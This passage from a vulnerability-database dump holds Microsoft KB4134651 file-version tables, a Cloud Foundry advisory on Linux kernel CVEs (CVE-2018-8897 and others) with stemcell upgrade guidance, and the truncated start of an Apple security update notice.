applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7475</td><td>993,792</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7475</td><td>720,384</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7475</td><td>1,293,312</td><td>22-Apr-2018</td><td>06:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7475</td><td>546,816</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7475</td><td>401,408</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p>\u00a0</p></body></html>", "edition": 1, "modified": "2018-05-08T17:09:28", "id": "KB4134651", "href": "https://support.microsoft.com/en-us/help/4134651/", "published": "2018-05-08T16:29:40", "title": "Description of the security update for vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009: May 08, 2018", "type": "mskb", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "software", "cvelist": ["CVE-2018-1087", "CVE-2018-1000199", "CVE-2018-8897"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nNick Peterson discovered that the Linux kernel did not properly handle debug exceptions following a MOV/POP to SS instruction. A local attacker could use this to cause a denial of service (system crash). This issue only affected the amd64 architecture. (CVE-2018-8897)\n\nAndy Lutomirski discovered that the KVM subsystem of the Linux kernel did not properly emulate the ICEBP instruction following a MOV/POP to SS instruction. A local attacker in a KVM virtual machine could use this to cause a denial of service (guest VM crash) or possibly escalate privileges inside of the virtual machine. This issue only affected the i386 and amd64 architectures. (CVE-2018-1087)\n\nAndy Lutomirski discovered that the Linux kernel did not properly perform error handling on virtualized debug registers. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-1000199)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.61\n * 3421.x versions prior to 3421.59\n * 3445.x versions prior to 3445.45\n * 3468.x versions prior to 3468.42\n * 3541.x versions prior to 3541.25\n * 3586.x versions prior to 3586.7\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3363.x versions to 3363.61\n * Upgrade 3421.x versions to 3421.59\n * Upgrade 3445.x versions to 3445.45\n * Upgrade 3468.x versions to 3468.42\n * Upgrade 3541.x versions to 3541.25\n * Upgrade 3586.x versions to 3586.7\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3641-1](<https://usn.ubuntu.com/3641-1/>)\n * [CVE-2018-1000199](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1000199>)\n * [CVE-2018-1087](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1087>)\n * [CVE-2018-8897](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-8897>)\n", "edition": 7, "modified": "2018-06-05T00:00:00", "published": "2018-06-05T00:00:00", "id": "CFOUNDRY:AC693D367392F4AE1E35E167BAADA484", "href": "https://www.cloudfoundry.org/blog/usn-3641-1/", "title": "USN-3641-1: Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2020-05-07T18:08:56", "bulletinFamily": "software", "cvelist": ["CVE-2018-4187", "CVE-2018-4206", "CVE-2018-8897"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Security Update 2018-001\n\nReleased April 24, 2018\n\n**Crash Reporter**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: In some 